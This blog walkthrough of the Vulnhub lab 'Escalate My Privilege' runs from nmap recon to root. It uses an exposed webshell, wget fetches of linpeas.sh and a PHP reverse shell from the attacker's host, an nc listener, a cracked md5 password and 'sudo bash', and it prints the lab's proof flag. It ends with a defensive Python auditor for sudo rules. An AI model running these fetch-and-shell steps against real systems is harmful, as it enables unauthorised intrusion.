Vulnhub Escalate My Privilege: Detailed Walkthrough

Escalate My Privilege

Identifying the target host's IP address

Box URL:

https://www.vulnhub.com/entry/escalate-my-privileges-1,448/
┌──(kali㉿kali)-[~/Vulnhub/Escalate_my_privilege]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.64.0/16   |   Screen View: Unique Hosts                                                                                                                                                                      
                                                                                                                                                                                                                                          
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                                                                                                          
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                                                                                                                                         
 192.168.56.100  08:00:27:86:52:7b      1      60  PCS Systemtechnik GmbH                                                                                                                                                                 
 192.168.56.160  08:00:27:7d:e8:51      1      60  PCS Systemtechnik GmbH        

Using the Netdiscover tool that ships with Kali Linux, the target host's IP address is identified as 192.168.56.160

NMAP scan

┌──(kali㉿kali)-[~/Vulnhub/Escalate_my_privilege]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.160 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-07 20:49 EST
Nmap scan report for bogon (192.168.56.160)
Host is up (0.00035s latency).
Not shown: 65375 filtered tcp ports (no-response), 151 filtered tcp ports (host-prohibited)
PORT      STATE  SERVICE VERSION
22/tcp    open   ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 61:16:10:91:bd:d7:6c:06:df:a2:b9:b5:b9:3b:dd:b6 (RSA)
|   256 0e:a4:c9:fc:de:53:f6:1d:de:a9:de:e4:21:34:7d:1a (ECDSA)
|_  256 ec:27:1e:42:65:1c:4a:3b:93:1c:a1:75:be:00:22:0d (ED25519)
80/tcp    open   http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
| http-robots.txt: 1 disallowed entry 
|_/phpbash.php
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Check your Privilege
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
111/tcp   open   rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100003  3,4         2049/udp   nfs
|   100003  3,4         2049/udp6  nfs
|   100005  1,2,3      20048/tcp   mountd
|   100005  1,2,3      20048/tcp6  mountd
|   100005  1,2,3      20048/udp   mountd
|   100005  1,2,3      20048/udp6  mountd
|   100021  1,3,4      35320/udp6  nlockmgr
|   100021  1,3,4      40773/tcp   nlockmgr
|   100021  1,3,4      46054/tcp6  nlockmgr
|   100021  1,3,4      47138/udp   nlockmgr
|   100024  1          39117/tcp   status
|   100024  1          39243/tcp6  status
|   100024  1          49169/udp   status
|   100024  1          60805/udp6  status
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
875/tcp   closed unknown
2049/tcp  open   nfs_acl 3 (RPC #100227)
20048/tcp open   mountd  1-3 (RPC #100005)
42955/tcp closed unknown
46666/tcp closed unknown
54302/tcp closed unknown
MAC Address: 08:00:27:7D:E8:51 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 153.40 seconds

Although the NMAP scan reports many ports, some of them are closed and can be ignored. The ports worth analysing and enumerating are 22 (ssh), 80 (http) and 111 (rpc); the focus is the http service.

Get Access

┌──(kali㉿kali)-[~/Vulnhub/Escalate_my_privilege]
└─$ curl http://192.168.56.160           
<!DOCTYPE html>
<html>
<head>
        <title>Check your Privilege</title>
</head>
<body>
        <a href="https://www.armourinfosec.com" target="_blank"><img src="privilege.png" width="100%" height="910" alt="http://ip/phpbash.php"></a> 
</body>
</html>
┌──(kali㉿kali)-[~/Vulnhub/Escalate_my_privilege]
└─$ curl http://192.168.56.160/robots.txt
User-agent: *
Disallow: /phpbash.php

The box author's hint is obvious: robots.txt lists /phpbash.php. Visiting /phpbash.php reveals that it is a webshell:

apache@my_privilege
:/var/www/html# ls

index.html
phpbash.php
phpinfo.php
privilege.png
readme.txt
robots.txt
apache@my_privilege
:/var/www/html# cat readme.txt

HI
Find Armour User backup in /backup
apache@my_privilege
:/var/www/html# cd /backup

apache@my_privilege
:/backup# ls -alh

total 8.0K
drwxrwxrwx 3 root root 19 Mar 21 2020 .
dr-xr-xr-x. 19 root root 4.0K Mar 19 2020 ..
drwxr-xr-x 2 armour armour 4.0K Nov 7 20:56 armour
apache@my_privilege
:/backup# cd armour

apache@my_privilege
:/backup/armour# ls -alh

total 60K
drwxr-xr-x 2 armour armour 4.0K Nov 7 20:56 .
drwxrwxrwx 3 root root 19 Mar 21 2020 ..
-rw-r--r-- 1 root root 246 Nov 7 20:56 1.tar.gz
-rw-r--r-- 1 root root 261 Mar 21 2020 2020-03-21-08-06.tar.gz
-rw-r--r-- 1 root root 261 Mar 21 2020 2020-03-21-08-08.tar.gz
-rw-r--r-- 1 root root 261 Mar 21 2020 2020-03-21-08-09.tar.gz
-rw-r--r-- 1 root root 261 Nov 7 20:47 2022-11-07-20-47.tar.gz
-rw-r--r-- 1 root root 261 Nov 7 20:48 2022-11-07-20-48.tar.gz
-rw-r--r-- 1 root root 261 Nov 7 20:49 2022-11-07-20-49.tar.gz
-rw-r--r-- 1 root root 261 Nov 7 20:50 2022-11-07-20-50.tar.gz
-rw-r--r-- 1 root root 261 Nov 7 20:51 2022-11-07-20-51.tar.gz
-rw-r--r-- 1 root root 261 Nov 7 20:52 2022-11-07-20-52.tar.gz
-rw-r--r-- 1 root root 261 Nov 7 20:53 2022-11-07-20-53.tar.gz
-rw-r--r-- 1 root root 261 Nov 7 20:54 2022-11-07-20-54.tar.gz
-rw-r--r-- 1 root root 261 Nov 7 20:55 2022-11-07-20-55.tar.gz
-rw-r--r-- 1 root root 261 Nov 7 20:56 2022-11-07-20-56.tar.gz
apache@my_privilege
:/backup/armour# cat /etc/passwd

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
epmd:x:998:996:Erlang Port Mapper Daemon:/tmp:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
geoclue:x:997:994:User for geoclue:/var/lib/geoclue:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
dockerroot:x:996:991:Docker User:/var/lib/docker:/sbin/nologin
puppet:x:52:52:Puppet:/var/lib/puppet:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
armour:x:1000:1000::/home/armour:/bin/bash
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
nginx:x:995:990:Nginx web server:/opt/rh/nginx16/root/var/lib/nginx:/sbin/nologin
mysql:x:994:989:MySQL server:/var/lib/mysql:/bin/bash
exim:x:31:31:Exim Daemon:/dev/null:/bin/false
apache@my_privilege
:/backup/armour# uname -a

Linux my_privilege 3.10.0-1062.18.1.el7.x86_64 #1 SMP Tue Mar 17 23:49:17 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

Collect some basic information about the target host:


apache@my_privilege
:/backup/armour# which python

/usr/bin/python
apache@my_privilege
:/backup/armour# which nc

which: no nc in (/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin)
apache@my_privilege
:/backup/armour# cd /tmp

apache@my_privilege
:/tmp# wget http://192.168.56.137:8000/linpeas.sh

--2022-11-07 20:57:56-- http://192.168.56.137:8000/linpeas.sh
Connecting to 192.168.56.137:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 827827 (808K) [text/x-sh]
Saving to: 'linpeas.sh'

0K .......... .......... .......... .......... .......... 6% 98.6M 0s
50K .......... .......... .......... .......... .......... 12% 64.2M 0s
100K .......... .......... .......... .......... .......... 18% 472M 0s
150K .......... .......... .......... .......... .......... 24% 811M 0s
200K .......... .......... .......... .......... .......... 30% 115M 0s
250K .......... .......... .......... .......... .......... 37% 154M 0s
300K .......... .......... .......... .......... .......... 43% 785M 0s
350K .......... .......... .......... .......... .......... 49% 96.1M 0s
400K .......... .......... .......... .......... .......... 55% 710M 0s
450K .......... .......... .......... .......... .......... 61% 838M 0s
500K .......... .......... .......... .......... .......... 68% 795M 0s
550K .......... .......... .......... .......... .......... 74% 620M 0s
600K .......... .......... .......... .......... .......... 80% 746M 0s
650K .......... .......... .......... .......... .......... 86% 861M 0s
700K .......... .......... .......... .......... .......... 92% 865M 0s
750K .......... .......... .......... .......... .......... 98% 839M 0s
800K ........ 100% 687M=0.003s

2022-11-07 20:57:56 (243 MB/s) - 'linpeas.sh' saved [827827/827827]

apache@my_privilege
:/tmp# ls

linpeas.sh
apache@my_privilege
:/tmp# chmod +x linpeas.sh

chmod: changing permissions of 'linpeas.sh': Operation not permitted
apache@my_privilege
:/tmp# ls -alh

total 816K
drwxrwxrwt 2 root root 60 Nov 7 20:57 .
dr-xr-xr-x. 19 root root 4.0K Mar 19 2020 ..
-rw-r--r-- 1 root apache 809K Nov 7 20:57 linpeas.s

The linpeas.sh script can be uploaded to the target host, but its permissions cannot be changed.

So another approach is needed. Although phpbash.php itself provides a shell of sorts, its functionality is limited, so we try to upload our own PHP shell instead.

apache@my_privilege
:/tmp# cd /var/www

apache@my_privilege
:/var/www# ls

cgi-bin
html
apache@my_privilege
:/var/www# cd html

apache@my_privilege
:/var/www/html# ls

index.html
phpbash.php
phpinfo.php
privilege.png
readme.txt
robots.txt
apache@my_privilege
:/var/www/html# which wget

/usr/bin/wget
apache@my_privilege
:/var/www/html# wget http://192.168.56.137:8000/shell.php

--2022-11-07 21:03:54-- http://192.168.56.137:8000/shell.php
Connecting to 192.168.56.137:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5496 (5.4K) [application/octet-stream]
Saving to: 'shell.php'

0K ..... 100% 677M=0s

2022-11-07 21:03:54 (677 MB/s) - 'shell.php' saved [5496/5496]

apache@my_privilege
:/var/www/html# ls

index.html
phpbash.php
phpinfo.php
privilege.png
readme.txt
robots.txt
shell.php

shell.php is uploaded successfully. Next, start a listener locally on Kali Linux and open shell.php in the browser.

Privilege escalation

┌──(kali㉿kali)-[~/Vulnhub/Escalate_my_privilege]
└─$ sudo nc -nlvp 5555                                                       
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.160] 35040
Linux my_privilege 3.10.0-1062.18.1.el7.x86_64 #1 SMP Tue Mar 17 23:49:17 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 21:05:17 up 19 min,  0 users,  load average: 0.02, 0.16, 0.13
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
sh-4.2$ which python
which python
/usr/bin/python
sh-4.2$ python -c 'import pty;pty.spawn("/binb/bash")'
python -c 'import pty;pty.spawn("/binb/bash")'
Traceback (most recent call last):
  File "<string>", line 1, in <module>
  File "/usr/lib64/python2.7/pty.py", line 165, in spawn
    pid, master_fd = fork()
  File "/usr/lib64/python2.7/pty.py", line 107, in fork
    master_fd, slave_fd = openpty()
  File "/usr/lib64/python2.7/pty.py", line 29, in openpty
    master_fd, slave_name = _open_terminal()
  File "/usr/lib64/python2.7/pty.py", line 70, in _open_terminal
    raise os.error, 'out of pty devices'
OSError: out of pty devices
sh-4.2$ python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
Traceback (most recent call last):
  File "<string>", line 1, in <module>
  File "/usr/lib64/python2.7/pty.py", line 165, in spawn
    pid, master_fd = fork()
  File "/usr/lib64/python2.7/pty.py", line 107, in fork
    master_fd, slave_fd = openpty()
  File "/usr/lib64/python2.7/pty.py", line 29, in openpty
    master_fd, slave_name = _open_terminal()
  File "/usr/lib64/python2.7/pty.py", line 70, in _open_terminal
    raise os.error, 'out of pty devices'
OSError: out of pty devices
sh-4.2$ which python3            
which python3
/usr/bin/python3
sh-4.2$ python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
bash-4.2$ id
id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-4.2$ cd /tmp
cd /tmp
bash-4.2$ ls                                     
ls
linpeas.sh  tmux-48
bash-4.2$ ls -alh
ls -alh
total 816K
drwxrwxrwt   3 root root     80 Nov  7 20:59 .
dr-xr-xr-x. 19 root root   4.0K Mar 19  2020 ..
-rw-r--r--   1 root apache 809K Nov  7 20:57 linpeas.sh
drwx------   2 root apache   40 Nov  7 20:59 tmux-48
bash-4.2$ chmod +x linpeas.sh
chmod +x linpeas.sh
chmod: changing permissions of 'linpeas.sh': Operation not permitted
bash-4.2$ 

Although Kali Linux receives the reverse shell, this shell is still restricted and still cannot change file permissions. Browsing the directories and files next turns up an interesting file, Credentials.txt

armour
bash-4.2$ cd armour
cd armour
bash-4.2$ ls -alh
ls -alh
total 24K
drwxrwxrwx  3 armour armour 121 Mar 21  2020 .
drwxr-xr-x. 3 root   root    19 Apr 11  2018 ..
-rwxrwxrwx  1 armour armour 123 Mar 19  2020 .bash_history
-rwxrwxrwx  1 armour armour  27 Mar 17  2020 .bashrc
drwxrwxrwx  3 armour armour  18 Mar 17  2020 .local
-rwxrwxrwx  1 root   armour 603 Mar 17  2020 .viminfo
-rw-r--r--  1 armour armour  30 Mar 21  2020 Credentials.txt
-rwxrwxrwx  1 root   root    17 Mar 17  2020 backup.sh
-rwxrwxrwx  1 root   root     8 Mar 17  2020 runme.sh
bash-4.2$ cat Credentials.txt
cat Credentials.txt
my password is
md5(rootroot1)
bash-4.2$ 

Here the author hints that the armour user's password is the md5 hash of rootroot1

After obtaining the hashed value with an online tool, log in:

bash-4.2$ su - armour
su - armour
Password: b7bc8489abe360486b4b19dbc242e885

Last login: Sat Mar 21 07:51:51 EDT 2020
-bash-4.2$ id
id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
-bash-4.2$ sudo -l
sudo -l
Matching Defaults entries for armour on my_privilege:
    requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
    DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
    PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
    LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
    LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", env_keep+=LD_PRELOAD,
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User armour may run the following commands on my_privilege:
    (ALL : ALL) NOPASSWD: /bin/sh, /bin/bash, /usr/bin/sh, /usr/bin/bash,
        /bin/tcsh, /bin/csh, /bin/ksh, /bin/rksh, /bin/zsh, /usr/bin/fish,
        /bin/dash, /usr/bin/tmux, /usr/bin/rsh, /bin/rc, /usr/bin/rc,
        /usr/bin/rssh, /usr/bin/scponly, /bin/scponly, /usr/bin/rootsh,
        /usr/bin/shc, /usr/bin/shtool, /usr/bin/targetcli, /usr/bin/nano,
        /usr/bin/rnano, /usr/bin/awk, /usr/bin/dgawk, /usr/bin/gawk,
        /usr/bin/igawk, /usr/bin/pgawk, /usr/bin/curl, /bin/ed, /bin/red,
        /usr/bin/env, /usr/bin/cat, /usr/bin/chcon, /usr/bin/chgrp,
        /usr/bin/chmod, /usr/bin/chown, /usr/bin/cp, /usr/bin/cut, /usr/bin/dd,
        /usr/bin/head, /usr/bin/ln, /usr/bin/mv, /usr/bin/nice, /usr/bin/tail,
        /usr/bin/uniq, /usr/bin/ftp, /usr/bin/pftp, /usr/bin/zip,
        /usr/bin/zipcloak, /usr/bin/zipnote, /usr/bin/zipsplit,
        /usr/bin/funzip, /usr/bin/unzip, /usr/bin/unzipsfx, /usr/bin/zipgrep,
        /usr/bin/zipinfo, /usr/bin/7za, /usr/bin/socat, /usr/bin/php,
        /usr/bin/git, /usr/bin/rvim, /usr/bin/rvim, /usr/bin/vim,
        /usr/bin/vimdiff, /usr/bin/vimtutor, /usr/bin/vi, /bin/sed,
        /usr/bin/qalc, /usr/bin/e3, /usr/bin/dex, /usr/bin/elinks,
        /usr/bin/scp, /usr/bin/sftp, /usr/bin/ssh, /usr/bin/gtar, /usr/bin/tar,
        /usr/bin/rpm, /usr/bin/up2date, /usr/bin/yum, /usr/bin/expect,
        /usr/bin/find, /usr/bin/less, /usr/bin/more, /usr/bin/perl,
        /usr/bin/python, /usr/bin/man, /usr/bin/tclsh, /usr/bin/script,
        /usr/bin/nmap, /usr/bin/nmap, /usr/bin/aria2c, /usr/sbin/arp,
        /usr/bin/base64, /usr/bin/busybox, /usr/bin/cpan, /usr/bin/cpulimit,
        /usr/bin/crontab, /usr/bin/date, /usr/bin/diff, /usr/bin/dmesg,
        /usr/sbin/dmsetup, /usr/bin/dnf, /usr/bin/docker,
        /usr/bin/easy_install, /usr/bin/emacs, /usr/bin/expand,
        /usr/bin/facter, /usr/bin/file, /usr/bin/finger, /usr/bin/flock,
        /usr/bin/fmt, /usr/bin/fold, /usr/bin/gdb, /usr/bin/gimp,
        /usr/bin/grep, /usr/bin/head, /usr/sbin/iftop, /usr/bin/ionice,
        /usr/sbin/ip, /usr/bin/irb, /usr/bin/jjs, /usr/bin/journalctl,
        /usr/bin/jq, /usr/sbin/ldconfig, /usr/sbin/logsave, /usr/bin/ltrace,
        /usr/bin/lua, /usr/bin/mail, /usr/bin/make, /usr/bin/mawk,
        /usr/bin/mount, /usr/sbin/mtr, /usr/bin/mysql, /usr/bin/nawk,
        /usr/bin/ncat, /usr/bin/nl, /usr/bin/node, /usr/bin/od,
        /usr/bin/openssl, /usr/bin/perl, /usr/bin/pic, /usr/bin/pip,
        /usr/bin/puppet, /usr/bin/readelf, /usr/bin/red, /usr/bin/rlwrap,
        /usr/bin/rpmquery, /usr/bin/rsync, /usr/bin/ruby, /usr/bin/run-parts,
        /usr/bin/screen, /usr/bin/sed, /usr/sbin/service, /usr/bin/setarch,
        /usr/bin/sftp, /usr/bin/shuf, /usr/bin/smbclient, /usr/bin/socat,
        /usr/bin/sort, /usr/bin/sqlite3, /usr/bin/stdbuf, /usr/bin/strace,
        /usr/bin/systemctl, /usr/bin/taskset, /usr/bin/tclsh,
        /usr/sbin/tcpdump, /usr/bin/tee, /usr/bin/telnet, /usr/bin/tftp,
        /usr/bin/time, /usr/bin/timeout, /usr/bin/top, /usr/bin/ul,
        /usr/bin/unexpand, /usr/bin/unshare, /usr/bin/watch, /usr/bin/wget,
        /usr/bin/xargs, /usr/bin/xxd, /script/test.sh, /script/test.py,
        /sbin/httpd, /usr/sbin/setcap, /usr/sbin/getcap, /usr/local/bin/ht,
        /bin/timedatectl, /home/armour/ai, /usr/bin/user_hello
-bash-4.2$ sudo bash
sudo bash
[root@my_privilege armour]# id
id
uid=0(root) gid=0(root) groups=0(root)
[root@my_privilege armour]# cd /root
cd /root
[root@my_privilege ~]# ls
ls
proof.txt
[root@my_privilege ~]# cat proof.txt
cat proof.txt
Best of Luck
628435356e49f976bab2c04948d22fe4
[root@my_privilege ~]# 

After running sudo -l there are far too many commands that can be used to escalate privileges; pick the simplest one, sudo bash
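The sudo -l output above is the kind of sudoers misconfiguration an administrator should catch before an attacker does. As an added example that is not part of the original walkthrough, the following Python script parses `sudo -l` output (a shortened, constructed excerpt of the one shown above) and flags NOPASSWD entries for shells, interpreters, editors, file-handling tools, paths outside the system bin directories (which may be writable by the user), and an env_keep that preserves LD_PRELOAD. The risk classes are my own grouping, not an exhaustive list.

```python
import re
# Constructed excerpt of the `sudo -l` output from the walkthrough (command list shortened).
SUDO_L_OUTPUT = r"""Matching Defaults entries for armour on my_privilege:
    requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
    DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+=LD_PRELOAD,
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User armour may run the following commands on my_privilege:
    (ALL : ALL) NOPASSWD: /bin/sh, /bin/bash, /usr/bin/sh, /usr/bin/bash,
        /bin/tcsh, /usr/bin/tmux, /usr/bin/nano, /usr/bin/awk, /usr/bin/curl,
        /usr/bin/env, /usr/bin/cat, /usr/bin/chmod, /usr/bin/cp, /usr/bin/find,
        /usr/bin/less, /usr/bin/perl, /usr/bin/python, /usr/bin/vim,
        /home/armour/ai, /usr/bin/user_hello
"""

# Binary classes that give a root shell or root-level file access when allowed via sudo.
RISK_CLASSES = {
    "shell": {"sh", "bash", "tcsh", "csh", "ksh", "rksh", "zsh", "fish", "dash", "tmux", "screen"},
    "interpreter": {"python", "python3", "perl", "ruby", "lua", "node", "php", "tclsh",
                    "irb", "awk", "gawk", "mawk", "nawk"},
    "editor/pager": {"vi", "vim", "rvim", "vimdiff", "nano", "rnano", "emacs", "less",
                     "more", "man", "ed"},
    "file/exec tool": {"cat", "cp", "mv", "chmod", "chown", "chgrp", "dd", "tee", "find",
                       "env", "curl", "wget"},
}
SYSTEM_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/local/bin/")
RULE_RE = re.compile(r"\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.*)")

def parse_sudo_l(text):
    """Parse `sudo -l` output into rule dicts: {'runas', 'tags', 'commands'}."""
    lines = text.splitlines()
    start = next((i for i, l in enumerate(lines) if "may run the following commands" in l), None)
    raw_rules, current = [], []
    for line in (lines[start + 1:] if start is not None else []):
        if line.lstrip().startswith("("):       # a rule starts with its (RunAs) spec
            current = [line.strip()]
            raw_rules.append(current)
        elif current and line.strip():          # wrapped continuation of the command list
            current.append(line.strip())
    rules = []
    for parts in raw_rules:
        m = RULE_RE.match(" ".join(parts))
        if m:
            tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
            cmds = [c.strip() for c in m.group("cmds").split(",") if c.strip()]
            rules.append({"runas": m.group("runas").strip(), "tags": tags, "commands": cmds})
    return rules

def classify(path):
    """Risk class of a sudo-permitted command path, or None if unremarkable."""
    name = path.rsplit("/", 1)[-1]
    for kind, names in RISK_CLASSES.items():
        if name in names:
            return kind
    if not path.startswith(SYSTEM_DIRS):
        return "non-system path"                # verify who can write this file
    return None

def audit(text):
    """Findings as (item, risk class, nopasswd, runas) tuples, Defaults issues first."""
    findings = []
    if "LD_PRELOAD" in text.split("may run the following commands")[0]:
        findings.append(("Defaults", "env_keep preserves LD_PRELOAD", False, "-"))
    for rule in parse_sudo_l(text):
        nopasswd = "NOPASSWD" in rule["tags"]
        for cmd in rule["commands"]:
            if kind := classify(cmd):
                findings.append((cmd, kind, nopasswd, rule["runas"]))
    return findings
```

Running `audit(SUDO_L_OUTPUT)` flags every entry in the excerpt except /usr/bin/user_hello; on a real host, feed it the output of `sudo -l` for each account and treat any "shell" or "interpreter" hit with NOPASSWD as equivalent to granting root.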

Privilege escalation successful!!!

Posted 2022-11-08 10:27 by Jason_huawen